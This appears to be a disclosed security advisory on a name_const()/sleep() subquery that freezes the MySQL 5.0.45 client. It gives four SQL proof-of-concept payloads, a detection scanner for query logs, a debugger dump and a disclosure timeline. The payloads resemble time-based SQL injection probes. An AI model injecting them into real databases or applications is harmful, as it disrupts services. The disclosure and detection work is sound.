
MySQL 5.0.45 Client Crash POC

Author: Osanda Malith Jayathissa, Published: 09-10-2014
# Exploit Title: MySQL 5.0.45 Client Crash POC
# Date: October 8th 2014
# Author: Osanda Malith Jayathissa
# E-Mail: osanda<[at]>unseen.com
# Version: mysql Ver 14.12 Distrib 5.0.45, for Win32 (ia32)
# Vendor Homepage: http://www.mysql.com/
# Tested on: Windows 8 64-bit

[-] Details
--------------

This is a small client crash I found in the name_const() function of MySQL 5.0.45, tested in a Windows 8 environment.
Recent versions reject a SELECT subquery as an argument to name_const(), so the issue does not reproduce there; it does reproduce in older
versions from 5.0.12 (the release that introduced name_const()) onwards. While fuzzing name_const() I noticed that a conditional statement inside a
sub query passed to it makes the mysql.exe client freeze. Pressing ^C twice produces the error message below and the mysql.exe process terminates.

[-] PoC
--------------

You can reproduce this crash with SELECT, INSERT, UPDATE and DELETE statements that carry the name_const() payload:

[+] select 1 and 1=(select*from(select(name_const((select if ((select 1) = 1, sleep(5), null)),1)))a);
[+] insert into users values (20 ,'foo' and (select*from(select(name_const((select if ((select 1) = 1, sleep(5), null)),1)))a) and '','bar');
[+] update users set password='foo' and (select*from(select(name_const((select if ((select 1) = 1, sleep(5), null)),1)))a) and '' where id=2;
[+] delete from users where id=2 and (select*from(select(name_const((select if ((select 1) = 1, sleep(5), null)),1)))a);

- You can also write the payload to a new file named payload.sql and pipe it into the MySQL client:

select 1 and 1=(select*from(select(name_const((select if ((select 1) = 1, sleep(5), null)),1)))a);

mysql.exe -u root -p < payload.sql
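The statements above share one shape: a name_const() call whose argument list contains a subquery, with sleep() inside it to make the freeze visible. As an added example (not part of the original advisory and not the author's code), the Python scanner below looks for that shape in MySQL general query log lines, so the statements can be picked out of server-side logs regardless of whether they were wrapped in SELECT, INSERT, UPDATE or DELETE. The log lines are constructed for the example; the four flagged ones are the advisory's own PoC statements, the others are benign traffic added to show that ordinary name_const() use is not flagged. Comment and string-literal stripping are assumptions about how an attacker might obfuscate the call, not something the advisory describes.

```python
import re
from typing import List, Optional

# Constructed sample of a MySQL general query log (not from the original page).
# The four name_const() lines are the advisory's PoC statements; the rest are
# benign traffic added to show the scanner does not flag ordinary name_const() use.
SAMPLE_GENERAL_LOG = """\
141008 21:03:11       3 Query       select 1 and 1=(select*from(select(name_const((select if ((select 1) = 1, sleep(5), null)),1)))a)
141008 21:03:20       3 Query       select name_const('id', 42)
141008 21:03:25       3 Query       insert into users values (20 ,'foo' and (select*from(select(name_const((select if ((select 1) = 1, sleep(5), null)),1)))a) and '','bar')
141008 21:03:30       3 Query       select id, name from users where id = 2
141008 21:03:41       3 Query       update users set password='foo' and (select*from(select(name_const((select if ((select 1) = 1, sleep(5), null)),1)))a) and '' where id=2
141008 21:03:52       3 Query       delete from users where id=2 and (select*from(select(name_const((select if ((select 1) = 1, sleep(5), null)),1)))a)
141008 21:04:00       3 Query       SELECT NAME_CONST ( 'x' , (SELECT 1) )
"""

# One general-log entry: optional "YYMMDD HH:MM:SS" (the server omits it when the
# second is unchanged), a thread id, the command type, and the argument text.
LOG_LINE_RE = re.compile(r"^(?:\d{6}\s+\d{1,2}:\d{2}:\d{2})?\s*(\d+)\s+Query\s+(.*)$")
NAME_CONST_RE = re.compile(r"name_const\s*\(", re.IGNORECASE)
SUBQUERY_RE = re.compile(r"\(\s*select\b", re.IGNORECASE)
TIMING_RE = re.compile(r"\b(?:sleep|benchmark)\s*\(", re.IGNORECASE)
COMMENT_RE = re.compile(r"/\*.*?\*/", re.DOTALL)
STRING_RE = re.compile(r"'(?:[^'\\]|\\.|'')*'|\"(?:[^\"\\]|\\.|\"\")*\"")


def normalize(sql: str) -> str:
    """Drop /* */ comments and blank out string literals so quoted text such as
    '(select 1)' cannot trigger a match (assumed obfuscation, not from the advisory)."""
    sql = COMMENT_RE.sub(" ", sql)
    return STRING_RE.sub("''", sql)


def name_const_args(sql: str) -> List[str]:
    """Return the raw argument text of every name_const(...) call, found by
    balancing parentheses from the call's opening '('."""
    args = []
    for m in NAME_CONST_RE.finditer(sql):
        depth, start, i = 1, m.end(), m.end()
        while i < len(sql) and depth:
            if sql[i] == "(":
                depth += 1
            elif sql[i] == ")":
                depth -= 1
            i += 1
        # Balanced call: text between the parentheses; truncated line: keep the rest.
        args.append(sql[start:i - 1] if depth == 0 else sql[start:])
    return args


def classify(sql: str) -> Optional[str]:
    """Return a reason string if the statement carries a subquery inside
    name_const(), else None.  A timing function inside the call is noted too."""
    for arg in name_const_args(normalize(sql)):
        if SUBQUERY_RE.search(arg):
            reason = "name_const() with subquery argument"
            if TIMING_RE.search(arg):
                reason += " and timing function"
            return reason
    return None


def scan_general_log(text: str) -> List[dict]:
    """Parse general-log lines and return the Query entries that classify() flags."""
    hits = []
    for line in text.splitlines():
        m = LOG_LINE_RE.match(line)
        if not m:
            continue
        thread, sql = m.group(1), m.group(2)
        reason = classify(sql)
        if reason:
            hits.append({"thread": thread, "sql": sql, "reason": reason})
    return hits


if __name__ == "__main__":
    for hit in scan_general_log(SAMPLE_GENERAL_LOG):
        print(f"thread {hit['thread']}: {hit['reason']}: {hit['sql'][:60]}...")
```

Run against the sample, the scanner flags the four PoC statements (all with the sleep() timing function) plus the bare NAME_CONST('x', (SELECT 1)) call, and leaves the two benign queries alone. The parenthesis balancing is what lets it work on the INSERT/UPDATE/DELETE wrappers: the call's argument text is extracted the same way whatever statement surrounds it.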

[-] Error Code (0x40010005) starting at KERNELBASE!PathCchAddExtension+0x000000000000eeb4 (Hash=0xd874d776.0xeb23281d)
----------------------------------------------------------------------------------------------------------------------

eax=09a6ff18 ebx=00000000 ecx=a6630000 edx=00000000 esi=00000000 edi=fffffffe
eip=75388172 esp=09a6fefc ebp=09a6ff84 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
KERNELBASE!PathCchAddExtension+0xeeb4:
75388172 897dfc mov dword ptr [ebp-4],edi ss:002b:09a6ff80=00000000

Note that 0x40010005 is DBG_CONTROL_C, the status a debugger reports when the console Ctrl+C handler fires, so the dump above shows where mysql.exe was when the ^C was delivered during the freeze rather than a memory-access fault: the instruction at eip is a plain stack store to a mapped address (ss:002b:09a6ff80 reads back as 00000000).

[-] Disclosure Timeline
------------------------

2014-05-13: Responsibly disclosed to Oracle.
2014-09-29: Received a response saying MySQL 5.0 is no longer officially supported and does not receive patches any more.
2014-10-08: Public disclosure.
